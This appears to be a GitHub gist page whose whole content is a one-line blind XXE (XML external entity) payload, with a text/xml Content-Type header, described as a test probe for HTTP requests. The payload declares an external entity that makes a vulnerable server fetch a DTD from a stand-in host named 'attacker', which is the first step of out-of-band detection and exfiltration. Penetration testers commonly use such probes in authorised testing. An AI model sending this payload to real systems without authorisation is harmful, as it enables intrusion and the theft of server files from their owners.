-
-
Save AmesianX/ce2ba7f864531eb7e01192966df0d070 to your computer and use it in GitHub Desktop.
Simplest Blind XXE Payload to test within HTML request
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Content-Type: text/xml | |
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment